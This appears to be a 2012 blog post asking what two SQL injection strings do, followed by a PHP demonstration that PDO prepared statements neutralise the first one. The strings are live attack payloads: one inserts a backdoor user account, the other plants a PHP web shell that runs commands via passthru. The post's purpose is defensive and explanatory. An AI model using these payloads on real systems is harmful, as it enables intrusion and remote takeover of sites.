Friday, 20 April 2012

Why are these snippets of code risky? (SQL Injection)

1. ' union select 1, 'users (user, password) values (\'haxor\', \'1337\') #', 2 #
2. ' union select 1, 'modules (plugin) values (\'if (isset($_GET[\\\'cmd\\\'])) {passthru($_GET[\\\'cmd\\\']);}\') #', 2 #

What do those code snippets do? How can I prevent them in my PHP file? What is 1337? And why are there a lot of \ ?
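On the prevention question, an added example that is not part of the original post: a PDO prepared statement with bound parameters, fed the first string from the post as untrusted input. The `items` table, the `findItems` helper and the in-memory SQLite database are assumptions made so the demo runs offline; the same PDO calls apply with the MySQL driver.

```php
<?php
// Constructed demo database (assumption): in-memory SQLite via PDO.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, qty INTEGER)');
$pdo->exec("INSERT INTO items (name, qty) VALUES ('widget', 3)");

// Hypothetical helper: the SQL text is fixed and the user-supplied value is
// sent separately as a bound parameter, so quotes, UNION and # inside the
// value are never parsed as SQL.
function findItems(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT id, name, qty FROM items WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// First string from the post, kept verbatim with a nowdoc (no escaping applied).
$input = <<<'EOT'
' union select 1, 'users (user, password) values (\'haxor\', \'1337\') #', 2 #
EOT;

// A legitimate lookup still works.
printf("rows for 'widget': %d\n", count(findItems($pdo, 'widget')));

// The string from the post is compared as a plain value and matches nothing.
printf("rows for posted string: %d\n", count(findItems($pdo, $input)));

// Writes use the same pattern: the string is stored byte for byte as data.
$ins = $pdo->prepare('INSERT INTO items (name, qty) VALUES (:name, :qty)');
$ins->execute([':name' => $input, ':qty' => 1]);

$rows = findItems($pdo, $input);
printf("stored and read back unchanged: %s\n",
    (count($rows) === 1 && $rows[0]['name'] === $input) ? 'yes' : 'no');
printf("total rows in items: %d\n",
    (int) $pdo->query('SELECT COUNT(*) FROM items')->fetchColumn());
```

Values read back from the database need the same treatment: bind them as parameters in any later query instead of concatenating them into SQL text.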
